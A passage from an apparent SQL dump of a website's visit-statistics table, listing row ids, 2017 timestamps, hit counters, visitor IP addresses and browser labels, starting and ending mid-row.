253,1,1,0,0,'40.77.167.60','other'),(126434,1498574309,1,1,0,0,'164.132.161.57','other'),(126435,1498575637,1,1,0,0,'217.182.132.186','other'),(126436,1498575671,1,1,0,0,'180.76.15.148','other'),(126437,1498575779,1,1,0,0,'51.255.65.90','other'),(126438,1498576175,1,1,0,0,'51.255.65.2','other'),(126439,1498576794,1,1,0,0,'51.255.71.128','other'),(126440,1498576837,1,1,0,0,'195.138.166.147','chrome'),(126441,1498577035,1,1,0,0,'217.182.132.56','other'),(126442,1498577102,1,0,1,0,'68.180.230.48',''),(126443,1498577641,1,1,0,0,'51.255.65.75','other'),(126444,1498578272,1,1,0,0,'164.132.161.35','other'),(126445,1498578535,1,1,0,0,'8.29.198.27','other'),(126446,1498578783,1,1,0,0,'62.80.176.45','firefox'),(126447,1498579006,1,1,0,0,'217.182.132.240','other'),(126448,1498579015,1,1,0,0,'217.182.132.52','other'),(126449,1498580028,1,1,0,0,'164.132.161.33','other'),(126450,1498580047,1,1,0,0,'157.55.39.204','other'),(126451,1498580421,1,1,0,0,'164.132.161.42','other'),(126452,1498580558,1,1,0,0,'51.255.65.85','other'),(126453,1498580846,1,1,0,0,'66.249.76.107','chrome'),(126454,1498580894,1,1,0,0,'217.182.132.88','other'),(126455,1498581292,1,1,0,0,'51.255.65.52','other'),(126456,1498581322,1,1,0,0,'51.255.71.101','other'),(126457,1498581405,1,1,0,0,'141.8.142.154','other'),(126458,1498582313,1,1,0,0,'66.249.66.157','chrome'),(126459,1498582582,1,1,0,0,'51.255.65.30','other'),(126460,1498582601,1,1,0,0,'51.255.65.68','other'),(126461,1498582684,1,1,0,0,'217.182.132.87','other'),(126462,1498582842,1,1,0,0,'91.196.178.165','chrome'),(126463,1498582903,1,1,0,0,'91.196.178.34','chrome'),(126464,1498583206,1,1,0,0,'51.255.71.118','other'),(126465,1498583536,1,1,0,0,'164.132.161.46','other'),(126466,1498583640,1,1,0,0,'51.255.71.120','other'),(126467,1498584315,1,1,0,0,'217.182.132.35','other'),(126468,1498584979,1,1,0,0,'164.132.161.47','other'),(126469,1498585200,1,1,0,0,'217.182.132.28','other'),(126470,1498585307,1,0,1,0,'66.249.66.157',''),(126471,1498585317,1,1,0,0,'51.255.65.9','other'),(126472,1498585547,1,1,0,0,'51.255.65.22','other'),(126473,1498585573,1,1,0,0,'217.69.133.2','other'),(126474,1498585671,1,1,0,0,'91.196.178.65','chrome'),(126475,1498585690,1,1,0,0,'217.182.132.181','other'),(126476,1498585733,1,1,0,0,'217.182.132.95','other'),(126477,1498586015,1,1,0,0,'87.250.224.18','other'),(126478,1498586061,1,0,1,0,'68.180.230.48',''),(126479,1498586137,1,1,0,0,'217.182.132.80','other'),(126480,1498586245,1,1,0,0,'51.255.65.8','other'),(126481,1498586470,1,1,0,0,'66.249.76.109','chrome'),(126482,1498586500,1,1,0,0,'216.244.66.237','other'),(126483,1498586837,1,1,0,0,'51.255.71.128','other'),(126484,1498586930,1,1,0,0,'217.182.132.170','other'),(126485,1498587010,1,1,0,0,'51.255.65.21','other'),(126486,1498587139,1,1,0,0,'164.132.161.58','other'),(126487,1498587457,1,1,0,0,'51.255.71.115','other'),(126488,1498587953,1,1,0,0,'37.55.57.32','chrome'),(126489,1498588073,1,1,0,0,'217.182.132.20','other'),(126490,1498588562,1,1,0,0,'217.182.132.176','other'),(126491,1498588652,1,1,0,0,'164.132.161.91','other'),(126492,1498588877,1,1,0,0,'51.255.71.121','other'),(126493,1498589075,1,0,1,0,'66.249.76.109',''),(126494,1498589159,1,1,0,0,'217.182.132.7','other'),(126495,1498589277,1,0,1,0,'66.249.66.74',''),(126496,1498589356,1,1,0,0,'8.29.198.26','other'),(126497,1498589416,1,1,0,0,'51.255.71.115','other'),(126498,1498589754,1,1,0,0,'217.69.133.5','other'),(126499,1498590422,2,2,0,0,'91.209.11.236','other'),(126500,1498590722,1,1,0,0,'66.249.76.108','chrome'),(126501,1498590752,1,1,0,0,'66.249.76.107','chrome'),(126502,1498590789,1,0,1,0,'68.180.230.48',''),(126503,1498591152,1,1,0,0,'66.249.76.109','chrome'),(126504,1498591580,1,1,0,0,'51.255.65.72','other'),(126505,1498591918,1,0,1,0,'68.180.230.48',''),(126506,1498591953,1,0,1,0,'66.249.66.155',''),(126507,1498592155,1,1,0,0,'217.182.132.14','other'),(126508,1498592626,1,1,0,0,'46.211.147.178','chrome'),(126509,1498592649,1,1,0,0,'137.74.207.108','other'),(126510,1498592720,1,1,0,0,'164.132.161.16','other'),(126511,1498593431,1,1,0,0,'164.132.161.63','other'),(126512,1498594151,1,1,0,0,'217.182.132.14','other'),(126513,1498594170,1,0,1,0,'66.249.66.74',''),(126514,1498594338,1,1,0,0,'164.132.161.33','other'),(126515,1498594425,1,1,0,0,'51.255.65.70','other'),(126516,1498595442,1,1,0,0,'164.132.161.17','other'),(126517,1498595538,1,1,0,0,'46.101.184.56','other'),(126518,1498595821,1,1,0,0,'164.132.161.30','other'),(126519,1498595990,1,1,0,0,'46.201.174.138','chrome'),(126520,1498595992,1,1,0,0,'217.182.132.73','other'),(126521,1498596277,1,1,0,0,'216.244.66.237','other'),(126522,1498596442,1,1,0,0,'91.196.178.163','chrome'),(126523,1498596552,1,1,0,0,'51.255.71.129','other'),(126524,1498597040,1,1,0,0,'217.182.132.19','other'),(126525,1498597092,1,1,0,0,'66.249.69.67','chrome'),(126526,1498597128,1,1,0,0,'217.182.132.192','other'),(126527,1498597454,1,1,0,0,'46.201.174.138','chrome'),(126528,1498597759,1,0,1,0,'66.249.66.76',''),(126529,1498597919,1,1,0,0,'51.255.65.85','other'),(126530,1498598098,1,1,0,0,'51.255.65.19','other'),(126531,1498598198,1,1,0,0,'217.182.132.97','other'),(126532,1498598513,1,1,0,0,'164.132.161.52','other'),(126533,1498598835,1,1,0,0,'137.74.207.120','other'),(126534,1498599261,1,0,1,0,'66.249.76.108',''),(126535,1498599343,1,1,0,0,'51.255.64.106','other'),(126536,1498599772,1,1,0,0,'66.249.66.157','chrome'),(126537,1498599803,1,1,0,0,'217.182.132.23','other'),(126538,1498600183,1,1,0,0,'8.29.198.27','other'),(126539,1498600494,1,1,0,0,'217.182.132.24','other'),(126540,1498600702,2,2,0,0,'66.249.76.108','chrome'),(126541,1498601498,1,1,0,0,'66.249.76.93','chrome'),(126542,1498601756,1,1,0,0,'217.182.132.146','other'),(126543,1498601780,1,1,0,0,'217.182.132.84','other'),(126544,1498601904,1,0,1,0,'66.249.76.108',''),(126545,1498602160,1,1,0,0,'137.74.207.109','other'),(126546,1498603317,1,1,0,0,'217.182.132.95','other'),(126547,1498603447,1,1,0,0,'66.249.76.109','chrome'),(126548,1498603678,1,1,0,0,'164.132.161.71','other'),(126549,1498603762,1,1,0,0,'66.249.66.156','chrome'),(126550,1498603790,1,1,0,0,'51.255.65.19','other'),(126551,1498604122,1,0,1,0,'66.249.76.107',''),(126552,1498604160,1,1,0,0,'51.255.65.76','other'),(126553,1498604722,1,1,0,0,'157.55.39.204','other'),(126554,1498605488,1,1,0,0,'137.74.207.120','other'),(126555,1498605742,1,0,1,0,'66.249.76.108',''),(126556,1498605903,1,1,0,0,'217.182.132.185','other'),(126557,1498606326,1,1,0,0,'217.182.132.188','other'),(126558,1498606542,1,1,0,0,'51.255.71.116','other'),(126559,1498607321,9,9,0,0,'144.76.12.99','other'),(126560,1498607826,1,1,0,0,'51.255.65.75','other'),(126561,1498607842,1,1,0,0,'164.132.161.91','other'),(126562,1498608727,1,1,0,0,'46.161.9.55','chrome'),(126563,1498609087,1,1,0,0,'217.182.132.60','other'),(126564,1498609835,1,1,0,0,'157.55.39.160','other'),(126565,1498610112,1,1,0,0,'66.249.76.108','chrome'),(126566,1498610822,1,1,0,0,'51.255.65.32','other'),(126567,1498610883,1,0,1,0,'68.180.230.48',''),(126568,1498610983,3,3,0,0,'91.209.11.236','other'),(126569,1498611008,1,1,0,0,'8.29.198.27','other'),(126570,1498611180,1,1,0,0,'137.74.207.108','other'),(126571,1498611584,1,1,0,0,'51.255.71.120','other'),(126572,1498611706,1,1,0,0,'51.255.65.39','other'),(126573,1498611822,1,1,0,0,'217.182.132.146','other'),(126574,1498612056,1,1,0,0,'217.69.133.194','other'),(126575,1498612075,1,0,1,0,'66.249.66.75',''),(126576,1498612076,1,1,0,0,'66.249.66.76','chrome'),(126577,1498612108,1,1,0,0,'95.108.181.13','other'),(126578,1498612199,1,1,0,0,'164.132.162.156','other'),(126579,1498612468,1,1,0,0,'164.132.161.88','other'),(126580,1498612595,1,0,1,0,'66.249.76.108',''),(126581,1498613296,1,1,0,0,'164.132.162.158','other'),(126582,1498614025,1,1,0,0,'51.255.71.131','other'),(126583,1498614104,1,0,1,0,'66.249.76.109',''),(126584,1498614721,1,1,0,0,'164.132.161.34','other'),(126585,1498614888,1,1,0,0,'137.74.207.110','other'),(126586,1498615098,1,1,0,0,'51.255.65.4','other'),(126587,1498615915,1,1,0,0,'217.182.132.53','other'),(126588,1498616386,1,1,0,0,'164.132.161.35','other'),(126589,1498616855,1,0,1,0,'66.249.66.157',''),(126590,1498616943,1,0,1,0,'66.249.76.108',''),(126591,1498617163,1,1,0,0,'51.255.65.28','other'),(126592,1498617510,1,1,0,0,'164.132.161.12','other'),(126593,1498617568,1,0,1,0,'66.249.76.107',''),(126594,1498618097,1,1,0,0,'51.255.65.20','other'),(126595,1498618353,1,1,0,0,'217.182.132.78','other'),(126596,1498618355,1,1,0,0,'217.182.132.24','other'),(126597,1498618813,1,1,0,0,'217.182.132.76','other'),(126598,1498618980,1,0,1,0,'66.249.76.109',''),(126599,1498619595,1,1,0,0,'51.255.71.114','other'),(126600,1498620151,1,1,0,0,'217.182.132.80','other'),(126601,1498620425,1,1,0,0,'185.26.180.28','other'),(126602,1498620503,1,1,0,0,'217.182.132.171','other'),(126603,1498620531,1,1,0,0,'40.77.167.60','other'),(126604,1498620745,1,0,1,0,'66.249.66.156',''),(126605,1498620828,1,1,0,0,'46.188.106.212','msie'),(126606,1498621467,1,1,0,0,'217.182.132.188','other'),(126607,1498621831,1,1,0,0,'8.29.198.27','other'),(126608,1498621907,1,1,0,0,'164.132.161.68','other'),(126609,1498622110,1,1,0,0,'164.132.161.48','other'),(126610,1498622469,1,1,0,0,'51.255.65.77','other'),(126611,1498622498,1,1,0,0,'66.249.66.156','chrome'),(126612,1498622528,1,1,0,0,'66.249.66.76','chrome'),(126613,1498622550,1,1,0,0,'188.32.239.91','chrome'),(126614,1498622597,1,1,0,0,'164.132.161.37','other'),(126615,1498623395,1,1,0,0,'164.132.161.36','other'),(126616,1498624046,1,1,0,0,'217.182.132.182','other'),(126617,1498624536,1,1,0,0,'217.182.132.154','other'),(126618,1498624597,1,1,0,0,'157.55.39.222','other'),(126619,1498624690,1,1,0,0,'137.74.207.159','other'),(126620,1498624742,1,1,0,0,'178.255.215.94','other'),(126621,1498624808,1,1,0,0,'66.249.76.108','chrome'),(126622,1498624893,1,1,0,0,'66.249.66.74','chrome'),(126623,1498624894,1,0,1,0,'66.249.76.91',''),(126624,1498624917,1,1,0,0,'217.182.132.175','other'),(126625,1498625210,1,1,0,0,'217.182.132.172','other'),(126626,1498625316,2,0,2,0,'66.249.76.109',''),(126627,1498625450,1,1,0,0,'164.132.161.69','other'),(126628,1498625764,1,1,0,0,'137.74.207.188','other'),(126629,1498625868,1,1,0,0,'66.249.76.93','chrome'),(126630,1498626030,1,1,0,0,'164.132.162.156','other'),(126631,1498626753,1,1,0,0,'141.8.132.39','other'),(126632,1498626787,1,1,0,0,'217.182.132.14','other'),(126633,1498627012,1,1,0,0,'46.161.9.55','firefox'),(126634,1498627013,1,1,0,0,'164.132.161.50','other'),(126635,1498627136,1,1,0,0,'164.132.161.30','other'),(126636,1498627304,1,1,0,0,'217.182.132.68','other'),(126637,1498627524,1,1,0,0,'91.196.178.65','chrome'),(126638,1498627533,1,1,0,0,'51.255.71.100','other'),(126639,1498627693,1,0,1,0,'66.249.76.109',''),(126640,1498627706,1,1,0,0,'137.74.207.110','other'),(126641,1498629521,1,1,0,0,'217.182.132.92','other'),(126642,1498629719,1,1,0,0,'164.132.161.78','other'),(126643,1498629812,1,0,1,0,'66.249.76.109',''),(126644,1498629888,1,1,0,0,'164.132.161.10','other'),(126645,1498630134,1,1,0,0,'217.182.132.74','other'),(126646,1498630696,1,1,0,0,'46.48.13.161','chrome'),(126647,1498631407,2,2,0,0,'91.209.11.236','other'),(126648,1498631459,1,1,0,0,'51.255.65.53','other'),(126649,1498631803,1,0,1,0,'66.249.76.109',''),(126650,1498631827,1,1,0,0,'51.255.65.89','other'),(126651,1498632015,1,1,0,0,'66.249.66.156','chrome'),(126652,1498632050,1,1,0,0,'66.249.76.93','chrome'),(126653,1498632179,1,1,0,0,'51.255.65.14','other'),(126654,1498632305,1,1,0,0,'164.132.161.34','other'),(126655,1498632425,1,1,0,0,'79.172.193.32','chrome'),(126656,1498632489,1,0,1,0,'66.249.76.108',''),(126657,1498632556,1,1,0,0,'180.76.15.32','other'),(126658,1498632635,1,1,0,0,'216.244.66.237','other'),(126659,1498632646,1,1,0,0,'8.29.198.25','other'),(126660,1498632766,1,0,1,0,'66.249.76.91',''),(126661,1498632793,2,0,2,0,'66.249.76.89',''),(126662,1498633026,1,0,1,0,'66.249.66.157',''),(126663,1498633138,1,0,1,0,'66.249.66.155',''),(126664,1498633431,1,1,0,0,'164.132.161.27','other'),(126665,1498633439,1,1,0,0,'40.77.167.60','other'),(126666,1498633476,1,1,0,0,'176.195.189.189','msie'),(126667,1498633778,1,1,0,0,'37.55.57.32','chrome'),(126668,1498633837,1,0,1,0,'66.249.76.107',''),(126669,1498633984,1,1,0,0,'164.132.161.74','other'),(126670,1498634324,1,0,1,0,'66.249.66.76',''),(126671,1498634599,14,14,0,0,'95.213.143.160','msie'),(126672,1498634692,1,1,0,0,'37.55.57.32','chrome'),(126673,1498634801,1,1,0,0,'217.182.132.180','other'),(126674,1498635581,1,1,0,0,'185.26.180.50','other'),(126675,1498635942,1,1,0,0,'51.255.65.40','other'),(126676,1498636788,1,1,0,0,'164.132.162.155','other'),(126677,1498636861,1,1,0,0,'51.255.65.39','other'),(126678,1498637163,1,0,1,0,'66.249.66.157',''),(126679,1498637190,1,0,1,0,'68.180.230.48',''),(126680,1498637645,1,1,0,0,'164.132.161.96','other'),(126681,1498637810,1,1,0,0,'217.182.132.92','other'),(126682,1498637902,1,1,0,0,'51.255.65.78','other'),(126683,1498638086,1,1,0,0,'217.182.132.147','other'),(126684,1498638124,1,1,0,0,'217.182.132.185','other'),(126685,1498638459,1,1,0,0,'66.249.76.107','chrome'),(126686,1498638460,1,1,0,0,'66.249.66.75','chrome'),(126687,1498638931,1,1,0,0,'217.182.132.173','other'),(126688,1498639747,1,1,0,0,'217.182.132.182','other'),(126689,1498639880,1,1,0,0,'164.132.161.49','other'),(126690,1498640531,1,1,0,0,'180.76.15.31','other'),(126691,1498641390,1,1,0,0,'164.132.162.157','other'),(126692,1498642158,1,1,0,0,'217.182.132.75','other'),(126693,1498642992,1,1,0,0,'46.48.13.161','chrome'),(126694,1498643301,1,1,0,0,'217.182.132.25','other'),(126695,1498643361,1,0,1,0,'66.249.76.107',''),(126696,1498643479,1,1,0,0,'8.29.198.26','other'),(126697,1498643541,21,21,0,0,'173.208.157.186','other'),(126698,1498643894,1,1,0,0,'66.249.76.93','chrome'),(126699,1498643895,1,1,0,0,'66.249.76.109','chrome'),(126700,1498644228,1,1,0,0,'164.132.161.19','other'),(126701,1498645064,1,1,0,0,'51.15.53.83','chrome'),(126702,1498645257,1,1,0,0,'91.196.178.34','chrome'),(126703,1498645407,1,1,0,0,'137.74.207.188','other'),(126704,1498645582,1,1,0,0,'164.132.162.156','other'),(126705,1498645635,1,1,0,0,'37.55.57.32','chrome'),(126706,1498645748,1,1,0,0,'51.255.65.97','other'),(126707,1498645890,1,1,0,0,'51.255.65.74','other'),(126708,1498645946,1,1,0,0,'164.132.162.187','other'),(126709,1498646021,1,1,0,0,'51.255.65.13','other'),(126710,1498646078,1,1,0,0,'51.255.65.64','other'),(126711,1498646083,1,1,0,0,'164.132.161.68','other'),(126712,1498646134,1,0,1,0,'66.249.66.74',''),(126713,1498646442,1,1,0,0,'157.55.39.160','other'),(126714,1498646509,1,1,0,0,'51.255.71.100','other'),(126715,1498646541,1,1,0,0,'164.132.161.61','other'),(126716,1498646725,1,1,0,0,'51.255.71.110','other'),(126717,1498647159,1,1,0,0,'164.132.161.90','other'),(126718,1498647914,2,2,0,0,'164.132.161.26','other'),(126719,1498647949,1,1,0,0,'217.182.132.71','other'),(126720,1498648452,1,1,0,0,'51.255.65.83','other'),(126721,1498648708,1,1,0,0,'66.249.76.113','chrome'),(126722,1498648710,1,1,0,0,'66.249.66.156','chrome'),(126723,1498648736,1,1,0,0,'180.76.15.155','other'),(126724,1498648991,1,1,0,0,'51.255.65.3','other'),(126725,1498649045,1,1,0,0,'51.255.65.17','other'),(126726,1498649226,1,1,0,0,'137.74.207.188','other'),(126727,1498649372,1,1,0,0,'91.196.178.165','chrome'),(126728,1498649522,1,1,0,0,'46.161.9.55','firefox'),(126729,1498650542,1,1,0,0,'51.255.65.79','other'),(126730,1498650572,1,1,0,0,'164.132.161.52','other'),(126731,1498651525,1,1,0,0,'178.154.200.45','other'),(126732,1498651587,1,0,1,0,'66.249.76.137',''),(126733,1498652418,1,1,0,0,'137.74.207.108','other'),(126734,1498652488,1,1,0,0,'164.132.161.16','other'),(126735,1498652880,1,1,0,0,'66.249.66.76','chrome'),(126736,1498652883,1,1,0,0,'66.249.66.157','chrome'),(126737,1498653353,1,0,1,0,'68.180.230.48',''),(126738,1498653551,1,1,0,0,'91.196.178.165','chrome'),(126739,1498653746,1,1,0,0,'91.196.178.134','chrome'),(126740,1498653991,1,1,0,0,'51.255.65.91','other'),(126741,1498654008,1,1,0,0,'157.55.39.239','other'),(126742,1498654248,1,1,0,0,'51.255.65.63','other'),(126743,1498654289,1,1,0,0,'176.105.99.10','chrome'),(126744,1498654304,1,1,0,0,'8.29.198.25','other'),(126745,1498654761,1,1,0,0,'217.182.132.171','other'),(126746,1498655789,1,1,0,0,'217.69.133.194','other'),(126747,1498655895,1,1,0,0,'164.132.161.38','other'),(126748,1498656533,1,1,0,0,'66.249.76.131','chrome'),(126749,1498656572,1,1,0,0,'51.255.65.32','other'),(126750,1498657171,1,1,0,0,'164.132.161.80','other'),(126751,1498657394,1,0,1,0,'68.180.230.48',''),(126752,1498657680,1,1,0,0,'66.249.76.113','chrome'),(126753,1498658132,1,1,0,0,'157.55.39.239','other'),(126754,1498658161,1,1,0,0,'66.249.66.75','chrome'),(126755,1498658172,1,1,0,0,'66.249.66.155','chrome'),(126756,1498658670,1,1,0,0,'66.249.76.112','chrome'),(126757,1498658691,1,1,0,0,'37.55.57.32','chrome'),(126758,1498658988,1,1,0,0,'178.154.200.2','other'),(126759,1498659044,1,0,1,0,'68.180.230.48',''),(126760,1498659499,1,1,0,0,'51.255.65.75','other'),(126761,1498659850,1,1,0,0,'217.182.132.65','other'),(126762,1498660120,1,1,0,0,'51.255.71.113','other'),(126763,1498660226,1,1,0,0,'51.255.65.15','other'),(126764,1498660247,1,1,0,0,'217.182.132.84','other'),(126765,1498660786,1,1,0,0,'51.255.65.39','other'),(126766,1498661524,1,1,0,0,'51.255.65.5','other'),(126767,1498661694,2,2,0,0,'176.8.88.35','other'),(126768,1498661725,1,1,0,0,'217.182.132.92','other'),(126769,1498662244,1,1,0,0,'51.255.65.85','other'),(126770,1498662947,1,1,0,0,'51.255.71.129','other'),(126771,1498663068,1,1,0,0,'51.255.65.16','other'),(126772,1498663216,1,1,0,0,'51.255.65.31','other'),(126773,1498663434,1,1,0,0,'217.182.132.241','other'),(126774,1498663878,1,1,0,0,'217.182.132.71','other'),(126775,1498664074,1,1,0,0,'95.221.255.172','firefox'),(126776,1498664181,1,1,0,0,'51.255.65.6','other'),(126777,1498664599,1,0,1,0,'66.249.66.157',''),(126778,1498664926,1,1,0,0,'217.182.132.183','other'),(126779,1498665100,1,0,1,0,'68.180.230.48',''),(126780,1498665134,1,1,0,0,'8.29.198.27','other'),(126781,1498665146,1,1,0,0,'137.74.207.114','other'),(126782,1498665185,2,2,0,0,'5.255.253.63','other'),(126783,1498665262,1,1,0,0,'141.8.183.1','other'),(126784,1498665273,1,1,0,0,'217.182.132.21','other'),(126785,1498665339,1,1,0,0,'180.76.15.146','other'),(126786,1498665430,1,1,0,0,'95.108.213.7','other'),(126787,1498665509,1,1,0,0,'217.182.132.5','other'),(126788,1498665561,3,3,0,0,'95.108.213.34','other'),(126789,1498665807,1,1,0,0,'51.255.65.6','other'),(126790,1498665837,1,1,0,0,'164.132.161.16','other'),(126791,1498666066,1,1,0,0,'141.8.142.154','other'),(126792,1498666322,1,1,0,0,'51.255.65.47','other'),(126793,1498666692,2,2,0,0,'95.108.179.15','other'),(126794,1498666696,1,1,0,0,'5.255.253.63','other'),(126795,1498666966,1,1,0,0,'164.132.161.82','other'),(126796,1498667268,2,2,0,0,'141.8.142.154','other'),(126797,1498667372,1,1,0,0,'51.255.65.9','other'),(126798,1498667423,2,2,0,0,'95.108.213.34','other'),(126799,1498668125,1,1,0,0,'87.250.224.7','other'),(126800,1498668342,1,1,0,0,'5.255.253.63','other'),(126801,1498668422,1,0,1,0,'66.249.76.112',''),(126802,1498668428,1,1,0,0,'217.182.132.184','other'),(126803,1498668455,3,3,0,0,'95.108.213.34','other'),(126804,1498668581,2,2,0,0,'87.250.224.18','other'),(126805,1498668582,1,1,0,0,'66.249.76.113','chrome'),(126806,1498668585,1,1,0,0,'66.249.76.131','chrome'),(126807,1498668677,1,1,0,0,'164.132.161.69','other'),(126808,1498668735,3,3,0,0,'5.255.253.58','other'),(126809,1498668738,1,1,0,0,'141.8.132.72','other'),(126810,1498668890,1,1,0,0,'95.108.179.15','other'),(126811,1498668904,2,2,0,0,'178.154.149.1','other'),(126812,1498668922,1,1,0,0,'95.108.181.13','other'),(126813,1498668979,3,3,0,0,'5.255.253.28','other'),(126814,1498669183,1,1,0,0,'164.132.161.56','other'),(126815,1498669264,1,1,0,0,'37.9.113.38','other'),(126816,1498669356,2,2,0,0,'95.108.213.34','other'),(126817,1498669359,1,1,0,0,'93.158.152.59','other'),(126818,1498669378,1,1,0,0,'87.250.224.7','other'),(126819,1498669409,1,1,0,0,'178.154.149.3','other'),(126820,1498669451,1,1,0,0,'141.8.142.154','other'),(126821,1498669485,1,1,0,0,'217.182.132.180','other'),(126822,1498669527,2,2,0,0,'87.250.224.8','other'),(126823,1498669605,1,1,0,0,'141.8.142.38','other'),(126824,1498669622,1,1,0,0,'51.255.71.131','other'),(126825,1498669631,2,2,0,0,'141.8.142.97','other'),(126826,1498669634,1,1,0,0,'87.250.224.4','other'),(126827,1498669648,2,2,0,0,'141.8.132.25','other'),(126828,1498669674,1,1,0,0,'5.255.253.58','other'),(126829,1498669691,1,1,0,0,'5.255.253.81','other'),(126830,1498669785,2,2,0,0,'91.209.11.236','other'),(126831,1498669971,1,1,0,0,'5.255.253.63','other'),(126832,1498670364,1,1,0,0,'164.132.161.97','other'),(126833,1498670405,1,1,0,0,'51.255.71.98','other'),(126834,1498670417,1,1,0,0,'95.108.179.15','other'),(126835,1498670533,1,1,0,0,'95.108.213.7','other'),(126836,1498670559,1,1,0,0,'141.8.142.164','other'),(126837,1498670689,1,1,0,0,'141.8.183.1','other'),(126838,1498670912,1,1,0,0,'51.255.65.36','other'),(126839,1498670990,1,1,0,0,'178.154.200.60','other'),(126840,1498671012,1,1,0,0,'141.8.132.25','other'),(126841,1498671014,1,1,0,0,'178.154.189.3','other'),(126842,1498671030,1,1,0,0,'95.108.181.26','other'),(126843,1498671114,1,1,0,0,'91.209.11.236','other'),(126844,1498671191,1,1,0,0,'178.154.200.64','other'),(126845,1498671307,1,1,0,0,'178.154.200.37','other'),(126846,1498671314,1,1,0,0,'54.165.59.7','other'),(126847,1498671317,1,1,0,0,'178.154.189.29','other'),(126848,1498671802,1,1,0,0,'87.250.224.18','other'),(126849,1498671948,1,1,0,0,'95.108.179.15','other'),(126850,1498671997,1,1,0,0,'217.182.132.32','other'),(126851,1498672059,5,5,0,0,'141.8.142.154','other'),(126852,1498672105,1,1,0,0,'51.255.71.122','other'),(126853,1498672203,1,1,0,0,'217.182.132.30','other'),(126854,1498672223,2,2,0,0,'87.250.224.7','other'),(126855,1498672353,2,2,0,0,'95.108.213.34','other'),(126856,1498672464,1,1,0,0,'141.8.142.164','other'),(126857,1498672568,1,1,0,0,'217.69.133.6','other'),(126858,1498672773,1,1,0,0,'51.255.65.5','other'),(126859,1498673439,1,1,0,0,'95.108.179.15','other'),(126860,1498673483,1,1,0,0,'141.8.142.48','other'),(126861,1498673543,1,1,0,0,'51.255.65.55','other'),(126862,1498673564,1,1,0,0,'66.249.76.112','chrome'),(126863,1498673570,1,1,0,0,'66.249.66.155','chrome'),(126864,1498673660,1,1,0,0,'87.250.224.8','other'),(126865,1498673740,1,1,0,0,'164.132.161.19','other'),(126866,1498673885,1,1,0,0,'164.132.161.28','other'),(126867,1498674069,1,1,0,0,'51.255.71.116','other'),(126868,1498674428,1,0,1,0,'66.249.76.137',''),(126869,1498674495,1,1,0,0,'164.132.161.14','other'),(126870,1498674921,1,1,0,0,'217.182.132.156','other'),(126871,1498675767,1,0,1,0,'66.249.76.131',''),(126872,1498675902,1,1,0,0,'51.255.65.77','other'),(126873,1498675974,1,1,0,0,'8.29.198.25','other'),(126874,1498676076,1,1,0,0,'51.255.65.90','other'),(126875,1498676140,1,1,0,0,'164.132.162.187','other'),(126876,1498676278,1,0,1,0,'66.249.66.157',''),(126877,1498676331,1,1,0,0,'51.255.65.65','other'),(126878,1498676908,1,1,0,0,'164.132.161.8','other'),(126879,1498677635,1,1,0,0,'164.132.161.48','other'),(126880,1498677824,1,1,0,0,'51.255.71.129','other'),(126881,1498677895,1,1,0,0,'217.182.132.56','other'),(126882,1498678160,1,1,0,0,'91.209.11.236','other'),(126883,1498679005,1,1,0,0,'199.58.86.206','other'),(126884,1498679473,1,1,0,0,'66.249.66.74','chrome'),(126885,1498679475,1,1,0,0,'66.249.76.137','chrome'),(126886,1498679903,1,0,1,0,'68.180.230.48',''),(126887,1498679911,1,1,0,0,'217.182.132.76','other'),(126888,1498680788,1,1,0,0,'164.132.161.10','other'),(126889,1498680926,1,1,0,0,'137.74.207.164','other'),(126890,1498680938,1,1,0,0,'157.55.39.239','other'),(126891,1498681052,1,1,0,0,'217.182.132.147','other'),(126892,1498681383,1,1,0,0,'164.132.161.33','other'),(126893,1498681637,1,0,1,0,'66.249.76.113',''),(126894,1498681795,1,1,0,0,'217.182.132.146','other'),(126895,1498681889,1,1,0,0,'51.255.65.9','other'),(126896,1498682112,1,1,0,0,'137.74.207.119','other'),(126897,1498682350,2,2,0,0,'95.108.213.32','other'),(126898,1498682451,1,0,1,0,'66.249.66.74',''),(126899,1498682817,1,1,0,0,'217.182.132.151','other'),(126900,1498682946,1,1,0,0,'87.250.224.16','other'),(126901,1498683290,1,1,0,0,'5.255.253.28','other'),(126902,1498683423,1,1,0,0,'40.77.167.33','other'),(126903,1498683467,1,1,0,0,'164.132.161.3','other'),(126904,1498683536,2,2,0,0,'178.154.200.2','other'),(126905,1498683701,1,1,0,0,'51.255.71.98','other'),(126906,1498683895,1,1,0,0,'164.132.161.62','other'),(126907,1498683901,1,1,0,0,'141.8.183.1','other'),(126908,1498683928,1,1,0,0,'87.250.224.18','other'),(126909,1498683954,1,1,0,0,'51.255.71.130','other'),(126910,1498684057,1,1,0,0,'66.249.76.114','chrome'),(126911,1498684060,1,1,0,0,'66.249.76.131','chrome'),(126912,1498684154,1,1,0,0,'51.255.65.58','other'),(126913,1498684360,1,1,0,0,'141.8.132.39','other'),(126914,1498684504,1,1,0,0,'157.55.39.125','other'),(126915,1498684624,1,0,1,0,'66.249.66.157',''),(126916,1498685024,1,1,0,0,'141.8.142.154','other'),(126917,1498685053,2,2,0,0,'95.108.213.34','other'),(126918,1498685112,1,1,0,0,'141.8.142.42','other'),(126919,1498685150,1,1,0,0,'141.8.142.164','other'),(126920,1498685215,1,0,1,0,'66.249.76.112',''),(126921,1498685218,1,1,0,0,'178.154.189.3','other'),(126922,1498685230,1,1,0,0,'51.255.65.29','other'),(126923,1498685435,1,1,0,0,'5.255.253.63','other'),(126924,1498685456,1,1,0,0,'51.255.65.32','other'),(126925,1498685503,1,1,0,0,'5.255.253.28','other'),(126926,1498685504,1,0,1,0,'66.249.76.137',''),(126927,1498685524,1,1,0,0,'141.8.132.50','other'),(126928,1498685527,1,1,0,0,'95.108.213.7','other'),(126929,1498685532,1,1,0,0,'141.8.142.97','other'),(126930,1498685533,1,1,0,0,'95.108.181.26','other'),(126931,1498685624,1,1,0,0,'91.209.11.236','other'),(126932,1498685640,1,1,0,0,'5.255.253.83','other'),(126933,1498685726,1,1,0,0,'216.244.66.237','other'),(126934,1498685840,1,1,0,0,'93.158.152.77','other'),(126935,1498685876,1,1,0,0,'87.250.224.7','other'),(126936,1498686104,1,1,0,0,'51.255.71.122','other'),(126937,1498686128,2,2,0,0,'95.108.213.34','other'),(126938,1498686153,1,1,0,0,'217.182.132.37','other'),(126939,1498686417,1,1,0,0,'95.108.179.15','other'),(126940,1498686542,1,0,1,0,'66.249.66.156',''),(126941,1498686711,1,0,1,0,'66.249.76.137',''),(126942,1498686802,1,1,0,0,'8.29.198.25','other'),(126943,1498686925,1,1,0,0,'141.8.142.38','other'),(126944,1498687035,2,2,0,0,'87.250.224.7','other'),(126945,1498687150,2,2,0,0,'141.8.142.154','other'),(126946,1498687195,1,1,0,0,'91.209.11.236','other'),(126947,1498687198,2,2,